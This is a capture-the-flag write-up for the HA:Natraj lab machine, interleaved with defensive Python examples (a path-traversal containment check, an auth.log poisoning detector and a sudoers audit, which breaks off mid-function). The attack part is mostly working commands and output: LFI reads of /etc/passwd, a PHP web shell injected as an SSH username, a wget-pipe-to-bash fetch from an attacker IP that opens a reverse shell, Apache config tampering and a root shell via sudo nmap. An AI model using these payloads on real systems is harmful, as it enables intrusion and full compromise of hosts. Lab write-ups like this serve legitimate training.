Ha Natraj#
Enum#
nmap -Pn -sV -sC 192.168.185.80 -oN scans/nmap.initial
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-18 18:22 IST
Nmap scan report for 192.168.185.80
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA)
| 256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA)
|_ 256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA:Natraj
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
Found the console directory
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-u "http://192.168.185.80/FUZZ" \
-mc all -fs 276
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.185.80/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 276
________________________________________________
[Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 35ms]
* FUZZ: images
[Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 30ms]
* FUZZ: console
:: Progress: [2798/30000] :: Job [1/1] :: 1282 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
There’s a file.php in there
curl -i http://192.168.185.80/console/file.php
HTTP/1.1 200 OK
Date: Fri, 18 Aug 2023 17:30:37 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
LFI#
Which, predictably, has an LFI in the file parameter
curl -i http://192.168.185.80/console/file.php?file=../../../../../etc/passwd
HTTP/1.1 200 OK
Date: Fri, 18 Aug 2023 17:30:55 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1398
Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
curl -s http://192.168.185.80/console/file.php?file=../../../../../etc/passwd|grep sh$
root:x:0:0:root:/root:/bin/bash
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
curl -s http://192.168.185.80/console/file.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
curl -s http://192.168.185.80/console/file.php?file=../../../../../etc/hosts
127.0.0.1 localhost
127.0.1.1 ubuntu
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
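The traversal payloads above work because file.php hands the parameter straight to the filesystem. As an added example (not from the write-up, and not the box's file.php, whose source is never shown), the block below runs those same payloads through a naive substring filter and through a containment check based on the resolved real path. The document root, the readme file and the symlink are constructed in a temporary directory for the demonstration.

```python
"""Added example, not part of the write-up and not the box's file.php (whose
source the write-up never shows): runs the traversal payloads seen above
through a naive substring filter and through a containment check, to show
which ones each catches. The document root, file names and the symlink are
constructed here for the demonstration."""
import os
import tempfile
from typing import Dict, Optional, Tuple
from urllib.parse import unquote

# Payloads taken from the write-up's requests and wfuzz hits, plus two
# constructed legitimate-looking names (a real file and a symlink).
PAYLOADS = [
    "readme.txt",
    "link.txt",
    "../../../../../etc/passwd",
    "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "/etc/passwd",
    "/./././././././././././etc/passwd",
    "///////../../../etc/passwd",
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
]


def naive_is_safe(requested: str) -> bool:
    """Substring filter: blocks the literal '../' and nothing else.
    Absolute paths, '/./' chains, encoded dots and symlinks all pass it."""
    return "../" not in requested


def safe_read(base_dir: str, requested: str) -> Optional[str]:
    """Containment check: decode once, reject NUL, resolve '.'/'..' and
    symlinks, then require the real path to sit under base_dir and to be a
    regular file. Returns the file contents, or None when the request is refused."""
    base = os.path.realpath(base_dir)
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    # os.path.join would discard base for an absolute request, so make the
    # request relative to the document tree first.
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        return None  # resolved outside the document root
    if not os.path.isfile(candidate):
        return None  # directory, missing file, device node, ...
    with open(candidate, "r", encoding="utf-8") as fh:
        return fh.read()


def run_demo() -> Dict[str, Tuple[bool, bool]]:
    """Build a throwaway document root and return {payload: (naive, hardened)},
    each flag saying whether that check would have served the request."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as outside:
        with open(os.path.join(root, "readme.txt"), "w", encoding="utf-8") as fh:
            fh.write("public document\n")
        secret = os.path.join(outside, "secret.txt")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("not for the web\n")
        # A symlink inside the root that points outside it: realpath follows it.
        os.symlink(secret, os.path.join(root, "link.txt"))
        results: Dict[str, Tuple[bool, bool]] = {}
        for payload in PAYLOADS:
            results[payload] = (naive_is_safe(payload), safe_read(root, payload) is not None)
        return results


if __name__ == "__main__":
    for payload, (naive, hardened) in run_demo().items():
        print(f"{'naive:served' if naive else 'naive:blocked':14} "
              f"{'hardened:served' if hardened else 'hardened:blocked':17} {payload}")
```

Only readme.txt survives the hardened check; the substring filter lets six of the eight through, including the symlink, which is why the check has to be done on the resolved path rather than on the string. An allowlist of servable names is stricter still and is the right fix when the set of files is fixed, as it usually is for a "console" page.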
Automating the exploration process
wfuzz -c -w ./lfi2.txt --hw 0 http://192.168.185.80/console/file.php?file=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.185.80/console/file.php?file=FUZZ
Total requests: 2292
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000018: 200 27 L 35 W 1398 Ch "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
000000016: 200 27 L 35 W 1398 Ch "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
000000092: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../etc/passwd"
000000084: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../etc/passwd"
000000078: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../etc/passwd"
000000076: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../etc/passwd"
000000074: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000072: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000069: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000116: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../etc/passwd"
000000199: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../etc/passwd"
000000198: 200 54 L 54 W 743 Ch "../../../../../../../../../../../../../../etc/group"
000000241: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../etc/passwd"
000000240: 200 54 L 54 W 743 Ch "../../../../../../../../../../../etc/group"
000000226: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../etc/passwd"
000000224: 200 7 L 22 W 186 Ch "../../../../../../../../../../../../etc/hosts"
000000223: 200 54 L 54 W 743 Ch "../../../../../../../../../../../../etc/group"
000000210: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../etc/passwd"
000000209: 200 54 L 54 W 743 Ch "../../../../../../../../../../../../../etc/group"
000000253: 200 54 L 54 W 743 Ch "../../../../../../../../../../etc/group"
000000281: 200 27 L 35 W 1398 Ch "../../../../../../../../etc/passwd"
000000300: 200 27 L 35 W 1398 Ch "../../../../../../../etc/passwd"
000000295: 200 54 L 54 W 743 Ch "../../../../../../../etc/group"
000000280: 200 54 L 54 W 743 Ch "../../../../../../../../etc/group"
000000267: 200 27 L 35 W 1398 Ch "../../../../../../../../../etc/passwd"
000000266: 200 54 L 54 W 743 Ch "../../../../../../../../../etc/group"
000000254: 200 27 L 35 W 1398 Ch "../../../../../../../../../../etc/passwd"
000000337: 200 27 L 35 W 1398 Ch "../../../../../../etc/passwd&=%3C%3C%3C%3C"
000000335: 200 27 L 35 W 1398 Ch "../../../../../../etc/passwd"
000000334: 200 54 L 54 W 743 Ch "../../../../../../etc/group"
000000357: 200 27 L 35 W 1398 Ch "../../../../../etc/passwd"
000000390: 200 54 L 54 W 743 Ch "../../../../etc/group"
000000391: 200 27 L 35 W 1398 Ch "../../../../etc/passwd"
000000352: 200 54 L 54 W 743 Ch "../../../../../etc/group"
000000596: 200 27 L 35 W 1398 Ch "/./././././././././././etc/passwd"
000000583: 200 27 L 35 W 1398 Ch "/../../../../../../../../../../etc/passwd"
000000570: 200 27 L 35 W 1398 Ch "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
000000614: 200 27 L 35 W 1398 Ch "///////../../../etc/passwd"
000000701: 200 194 L 599 W 5574 Ch "/boot/grub/grub.cfg"
000000754: 200 31 L 197 W 1332 Ch "/etc/apache2/sites-enabled/000-default.conf"
000000750: 200 15 L 46 W 320 Ch "/etc/apache2/ports.conf"
000000749: 200 29 L 102 W 749 Ch "/etc/apache2/mods-enabled/status.conf"
000000747: 200 20 L 124 W 724 Ch "/etc/apache2/mods-enabled/negotiation.conf"
000000746: 200 251 L 1128 W 7676 Ch "/etc/apache2/mods-enabled/mime.conf"
000000744: 200 10 L 31 W 395 Ch "/etc/apache2/mods-enabled/deflate.conf"
000000743: 200 24 L 131 W 843 Ch "/etc/apache2/mods-enabled/alias.conf"
000000742: 200 85 L 442 W 3110 Ch "/etc/apache2/mods-available/ssl.conf"
000000745: 200 5 L 18 W 157 Ch "/etc/apache2/mods-enabled/dir.conf"
000000741: 200 32 L 139 W 1280 Ch "/etc/apache2/mods-available/setenvif.conf"
000000740: 200 27 L 139 W 822 Ch "/etc/apache2/mods-available/proxy.conf"
000000737: 200 5 L 18 W 157 Ch "/etc/apache2/mods-available/dir.conf"
000000739: 200 251 L 1128 W 7676 Ch "/etc/apache2/mods-available/mime.conf"
000000736: 200 10 L 31 W 395 Ch "/etc/apache2/mods-available/deflate.conf"
000000735: 200 96 L 392 W 3374 Ch "/etc/apache2/mods-available/autoindex.conf"
000000731: 200 47 L 227 W 1782 Ch "/etc/apache2/envvars"
000000724: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000712: 200 88 L 467 W 3028 Ch "/etc/adduser.conf"
000000788: 200 15 L 124 W 722 Ch "/etc/crontab"
000000804: 200 54 L 207 W 1735 Ch "/etc/dhcp/dhclient.conf"
000000803: 200 20 L 99 W 604 Ch "/etc/deluser.conf"
000000799: 200 33 L 165 W 1235 Ch "/etc/default/grub"
000000798: 200 1 L 1 W 11 Ch "/etc/debian_version"
000000797: 200 83 L 485 W 2969 Ch "/etc/debconf.conf"
000000777: 200 144 L 207 W 5889 Ch "/etc/ca-certificates.conf"
000000769: 200 71 L 329 W 2319 Ch "/etc/bash.bashrc"
000000765: 200 55 L 351 W 3018 Ch "/etc/apt/sources.list"
000000822: 200 8 L 43 W 280 Ch "/etc/fuse.conf"
000000830: 200 1 L 1 W 7 Ch "/etc/hostname"
000000829: 200 3 L 18 W 92 Ch "/etc/host.conf"
000000828: 200 138 L 819 W 4861 Ch "/etc/hdparm.conf"
000000825: 200 55 L 55 W 760 Ch "/etc/group-"
000000823: 200 54 L 54 W 743 Ch "/etc/group"
000000815: 200 11 L 81 W 625 Ch "/etc/fstab"
000000898: 200 10 L 57 W 411 Ch "/etc/hosts.allow"
000000899: 200 17 L 111 W 711 Ch "/etc/hosts.deny"
000000897: 200 7 L 22 W 186 Ch "/etc/hosts"
000000954: 200 36 L 114 W 703 Ch "/etc/logrotate.conf"
000000953: 200 341 L 1753 W 10550 Ch "/etc/login.defs"
000000949: 200 17 L 40 W 332 Ch "/etc/ldap/ldap.conf"
000000948: 200 2 L 2 W 34 Ch "/etc/ld.so.conf"
000000944: 200 1 L 3 W 17 Ch "/etc/issue.net"
000000946: 200 6 L 22 W 144 Ch "/etc/kernel-img.conf"
000000943: 200 2 L 5 W 24 Ch "/etc/issue"
000000939: 200 355 L 1050 W 8181 Ch "/etc/init.d/apache2"
000001006: 200 20 L 63 W 513 Ch "/etc/nsswitch.conf"
000000999: 200 2 L 12 W 91 Ch "/etc/networks"
000000998: 200 8 L 39 W 247 Ch "/etc/network/interfaces"
000000983: 200 33 L 198 W 2447 Ch "/etc/mtab"
000000976: 200 5 L 36 W 195 Ch "/etc/modules"
000000969: 200 131 L 715 W 5174 Ch "/etc/manpath.config"
000000962: 200 4 L 6 W 103 Ch "/etc/lsb-release"
000001010: 200 12 L 17 W 382 Ch "/etc/os-release"
000001014: 200 27 L 35 W 1398 Ch "/etc/passwd"
000000963: 200 543 L 1307 W 14867 Ch "/etc/ltrace.conf"
000001016: 200 28 L 38 W 1487 Ch "/etc/passwd-"
000001012: 200 15 L 59 W 552 Ch "/etc/pam.conf"
000001106: 200 122 L 802 W 4620 Ch "/etc/security/access.conf"
000001097: 200 40 L 117 W 887 Ch "/etc/rpc"
000001095: 200 17 L 111 W 701 Ch "/etc/resolv.conf"
000001069: 200 27 L 97 W 581 Ch "/etc/profile"
000001122: 200 11 L 70 W 419 Ch "/etc/security/sepermit.conf"
000001151: 200 122 L 396 W 3264 Ch "/etc/ssh/sshd_config"
000001146: 200 51 L 218 W 1580 Ch "/etc/ssh/ssh_config"
000001123: 200 65 L 412 W 2179 Ch "/etc/security/time.conf"
000001119: 200 73 L 499 W 2972 Ch "/etc/security/pam_env.conf"
000001116: 200 56 L 347 W 2150 Ch "/etc/security/limits.conf"
000001117: 200 28 L 217 W 1440 Ch "/etc/security/namespace.conf"
000001112: 200 106 L 663 W 3635 Ch "/etc/security/group.conf"
000001160: 200 77 L 339 W 2683 Ch "/etc/sysctl.conf"
000001173: 200 4 L 45 W 403 Ch "/etc/updatedb.conf"
000001169: 200 1 L 1 W 20 Ch "/etc/timezone"
000001161: 200 3 L 14 W 77 Ch "/etc/sysctl.d/10-console-messages.conf"
000001162: 200 12 L 69 W 509 Ch "/etc/sysctl.d/10-network-security.conf"
000001308: 200 1 L 6 W 134 Ch "/proc/cmdline"
000001314: 200 1 L 5 W 27 Ch "/proc/loadavg"
000001310: 200 57 L 112 W 533 Ch "/proc/devices"
000001322: 200 3 L 46 W 450 Ch "/proc/net/tcp"
000001326: 200 0 L 1 W 27 Ch "/proc/self/cmdline"
000001324: 200 5 L 16 W 116 Ch "/proc/partitions"
000001321: 200 3 L 33 W 384 Ch "/proc/net/route"
000001323: 200 2 L 28 W 256 Ch "/proc/net/udp"
000001320: 200 42 L 124 W 1113 Ch "/proc/net/fib_trie"
000001325: 200 233 L 1563 W 17181 Ch "/proc/sched_debug"
000001318: 200 2 L 15 W 158 Ch "/proc/net/arp"
000001319: 200 4 L 54 W 448 Ch "/proc/net/dev"
000001317: 200 33 L 198 W 2447 Ch "/proc/mounts"
000001316: 200 41 L 246 W 2119 Ch "/proc/modules"
000001313: 200 60 L 220 W 1586 Ch "/proc/ioports"
000001315: 200 48 L 140 W 1335 Ch "/proc/meminfo"
000001312: 200 68 L 393 W 3513 Ch "/proc/interrupts"
000001309: 200 28 L 196 W 1142 Ch "/proc/cpuinfo"
000001311: 200 32 L 58 W 383 Ch "/proc/filesystems"
000001443: 200 1 L 17 W 146 Ch "/proc/version"
000001442: 200 2 L 10 W 95 Ch "/proc/swaps"
000001440: 200 53 L 129 W 1260 Ch "/proc/self/status"
000001441: 200 9 L 302 W 774 Ch "/proc/stat"
000001439: 200 1 L 52 W 319 Ch "/proc/self/stat"
000001438: 200 2 L 15 W 158 Ch "/proc/self/net/arp"
000001437: 200 33 L 198 W 2447 Ch "/proc/self/mounts"
000001725: 200 4 L 36 W 1513 Ch "/usr/share/pixmaps/debian-logo.png"
000001722: 200 88 L 467 W 3028 Ch "/usr/share/adduser/adduser.conf"
000001824: 200 683 L 8253 W 64983 Ch "/var/log/auth.log"
000001827: 200 2686 L 32224 W 250978 Ch "/var/log/auth.log.1"
000002044: 200 0 L 1 W 1152 Ch "/var/run/utmp"
Couldn’t find a log file to poison in the usual web server log locations
for i in $(cat file);do echo ${i};curl -s http://192.168.185.80/console/file.php?file=${i} ;done
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
But the SSH auth log can be leveraged
ssh yaya@192.168.185.80
The authenticity of host '192.168.185.80 (192.168.185.80)' can't be established.
ED25519 key fingerprint is SHA256:oikisLZJ8r96QhcB1H0OEK18JfSIUhkZ4+MmhbRuA6Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.185.80' (ED25519) to the list of known hosts.
yaya@192.168.185.80's password:
Permission denied, please try again.
yaya@192.168.185.80's password:
Permission denied, please try again.
yaya@192.168.185.80's password:
curl http://192.168.185.80/console/file.php?file=/var/log/auth.log|tail
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 71650 0 71650 0 0 506k 0 --:--:-- --:--:-- --:--:-- 507k
Aug 18 11:28:01 ubuntu CRON[24623]: pam_unix(cron:session): session closed for user root
Aug 18 11:29:01 ubuntu CRON[24626]: pam_unix(cron:session): session opened for user root by (uid=0)
Aug 18 11:29:01 ubuntu CRON[24626]: pam_unix(cron:session): session closed for user root
Aug 18 11:30:01 ubuntu CRON[24629]: pam_unix(cron:session): session opened for user root by (uid=0)
Aug 18 11:30:01 ubuntu CRON[24629]: pam_unix(cron:session): session closed for user root
Aug 18 11:30:22 ubuntu sshd[24632]: Invalid user yaya from 192.168.45.227 port 56084
Aug 18 11:30:24 ubuntu sshd[24632]: pam_unix(sshd:auth): check pass; user unknown
Aug 18 11:30:24 ubuntu sshd[24632]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.45.227
Aug 18 11:30:26 ubuntu sshd[24632]: Failed password for invalid user yaya from 192.168.45.227 port 56084 ssh2
Aug 18 11:30:26 ubuntu sshd[24632]: Connection closed by invalid user yaya 192.168.45.227 port 56084 [preauth]
LFI to RCE through log file poisoning#
Uploading a PHP web shell into the SSH auth log
ssh '<?php echo system($_GET["cmd"]); ?>'@192.168.185.80
<?php system($_GET["cmd"]); ?>@192.168.185.80's password:
^C
Using the web shell to trigger a staged reverse shell. This was a bit of a trial-and-error process, as the box does not have curl; it ended up working with wget.
wget -O- http://192.168.45.218:9090/shell.sh|bash
curl 'http://192.168.168.80/console/file.php?file=../../../../../var/log/auth.log?cmd=wget%20-O-%20http://192.168.45.218:9090/shell.sh%7Cbash'
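From the defender's side, the poisoning step leaves a very distinctive trace: sshd logs the attempted username verbatim, so a PHP tag ends up in /var/log/auth.log as the "user". The block below is an added example (not from the write-up) of detection logic over sample auth.log lines. The first two lines are copied from the tail of auth.log shown above; the last two are constructed to show what the poisoning attempt looks like in the log. The username pattern and marker list are assumptions for the demonstration.

```python
"""Added example, not from the write-up: detection logic for the log-poisoning
step above, run over sample auth.log lines. The first two lines are copied
from the write-up's tail of /var/log/auth.log; the last two are constructed
to show what sshd writes when the username itself carries a PHP tag."""
import re
from typing import Dict, List

SAMPLE_AUTH_LOG = """\
Aug 18 11:30:22 ubuntu sshd[24632]: Invalid user yaya from 192.168.45.227 port 56084
Aug 18 11:30:26 ubuntu sshd[24632]: Failed password for invalid user yaya from 192.168.45.227 port 56084 ssh2
Aug 18 11:31:02 ubuntu sshd[24640]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.45.227 port 56090
Aug 18 11:31:05 ubuntu sshd[24640]: Failed password for invalid user <?php system($_GET["cmd"]); ?> from 192.168.45.227 port 56090 ssh2
"""

# sshd logs the attempted username verbatim between 'user ' and ' from <ip> port <n>'.
INVALID_USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user) (?P<user>.*?) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)
# What a real account name looks like (assumed: Debian's default NAME_REGEX, 32 chars).
# Angle brackets, quotes, spaces or parentheses are not a typo but an injected payload.
SANE_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}\$?$", re.IGNORECASE)
# Markers of code meant to be executed later by an include or template engine.
PAYLOAD_MARKERS = ("<?", "?>", "<%", "${", "$(", "`")


def classify_username(user: str) -> str:
    """'payload' for script markers, 'malformed' for other junk, 'ok' otherwise."""
    if any(marker in user for marker in PAYLOAD_MARKERS):
        return "payload"
    if not SANE_USERNAME_RE.match(user):
        return "malformed"
    return "ok"


def scan_auth_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per invalid-user line whose username is not a sane name."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = INVALID_USER_RE.search(line)
        if not m:
            continue
        verdict = classify_username(m.group("user"))
        if verdict != "ok":
            findings.append({"ip": m.group("ip"), "port": m.group("port"),
                             "user": m.group("user"), "verdict": verdict})
    return findings


def attempts_by_ip(text: str) -> Dict[str, int]:
    """Count 'Invalid user' lines per source address (one line per attempt)."""
    counts: Dict[str, int] = {}
    for line in text.splitlines():
        m = INVALID_USER_RE.search(line)
        if m and ": Invalid user " in line:
            counts[m.group("ip")] = counts.get(m.group("ip"), 0) + 1
    return counts


if __name__ == "__main__":
    for finding in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{finding['verdict']:9} {finding['ip']}:{finding['port']} user={finding['user']!r}")
    print("invalid-user attempts per source:", attempts_by_ip(SAMPLE_AUTH_LOG))
```

Both constructed lines are flagged as "payload" from the same source address that made the earlier "yaya" attempt. The alert is only half the story: the step only works because auth.log is readable by www-data and the include is reachable, so the permissions on /var/log/auth.log (root:adm, 0640 on a stock Ubuntu) and the LFI itself are what actually need fixing.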
www-data having sudoers rules looks a bit weird to me, but ok. We can restart the Apache daemon.
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/systemctl start apache2
(ALL) NOPASSWD: /bin/systemctl stop apache2
(ALL) NOPASSWD: /bin/systemctl restart apache2
Restart the server as Mahakal#
We also have write access to the Apache config
ls -la /etc/apache2/apache2.conf
-rwxrwxrwx 1 root root 7254 Aug 20 10:36 /etc/apache2/apache2.conf
So let’s get a proper shell
┌──(blnkn㉿Kolossus)-[~]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.168.80] 54240
bash: cannot set terminal process group (545): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/console$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ole$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/console$ ^Z
[1]+ Stopped nc -lvnp 4242
┌──(blnkn㉿Kolossus)-[~]
└─$ stty raw -echo
┌──(blnkn㉿Kolossus)-[~]
└─$
nc -lvnp 4242
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@ubuntu:/var/www/html/console$ export TERM=screen
www-data@ubuntu:/var/www/html/console$ export SHELL=bash
www-data@ubuntu:/var/www/html/console$
www-data@ubuntu:/var/www/html/console$
Now we can use vim to modify the config so the server runs as mahakal, and then restart the daemon.
# These need to be set in /etc/apache2/envvars
User mahakal
Group mahakal
Mahakal can run nmap as root
mahakal@ubuntu:/home/mahakal$ sudo -l
Matching Defaults entries for mahakal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakal may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/nmap
Nmap privesc#
nmap is a GTFOBins entry and the sudo rule puts no restriction on its arguments
mahakal@ubuntu:/home/natraj$ TF=$(mktemp)
mahakal@ubuntu:/home/natraj$ echo 'os.execute("/bin/sh")' > $TF
mahakal@ubuntu:/home/natraj$ cat $TF
os.execute("/bin/sh")
mahakal@ubuntu:/home/natraj$ sudo nmap --script=$TF
Starting Nmap 7.60 ( https://nmap.org ) at 2023-08-18 12:29 PDT
NSE: Warning: Loading '/tmp/tmp.7IIkq3SoTy' -- the recommended file extension is '.nse'.
# uid=0(root) gid=0(root) groups=0(root)
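Both escalations on this box come down to two sudoers rules that look harmless in isolation: www-data may restart apache2 while apache2.conf is world-writable, and mahakal may run nmap with any arguments. The block below is an added example (not from the write-up) of how a defender would audit both sudo -l outputs above. It parses the rules, flags NOPASSWD entries on binaries that can spawn a shell, and flags service-start rules whose configuration file is world-writable. The list of shell-capable binaries is a deliberately short assumption, and the 0777 and 0644 file modes are constructed on temporary files to mirror the ls -la output above.

```python
"""Added example, not from the write-up: an audit of the two sudo -l outputs
shown above. It parses the rules, flags NOPASSWD entries for binaries that can
spawn a shell (the nmap rule), and flags service-start/restart rules whose
configuration is writable by anyone (the www-data rule next to the 0777
apache2.conf). SHELL_CAPABLE is a short assumption, not the full GTFOBins list;
run_demo() builds the file modes on temporary files."""
import os
import re
import stat
import tempfile
from typing import Dict, List, NamedTuple, Tuple

# The two sudo -l outputs from the write-up, copied verbatim.
WWW_DATA_SUDO_L = """\
User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/systemctl start apache2
    (ALL) NOPASSWD: /bin/systemctl stop apache2
    (ALL) NOPASSWD: /bin/systemctl restart apache2
"""
MAHAKAL_SUDO_L = """\
User mahakal may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/nmap
"""


class Rule(NamedTuple):
    runas: str
    nopasswd: bool
    command: str


# "(runas) TAG: TAG: /absolute/command args" as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/.*)$")

# Binaries with a documented sudo shell escape (assumed subset; a real audit uses the full list).
SHELL_CAPABLE = {"nmap", "vim", "vi", "less", "more", "find", "awk", "python3", "perl", "tar"}


def parse_sudo_l(text: str) -> List[Rule]:
    """Extract (runas, nopasswd, command) from each rule line of sudo -l output."""
    rules: List[Rule] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
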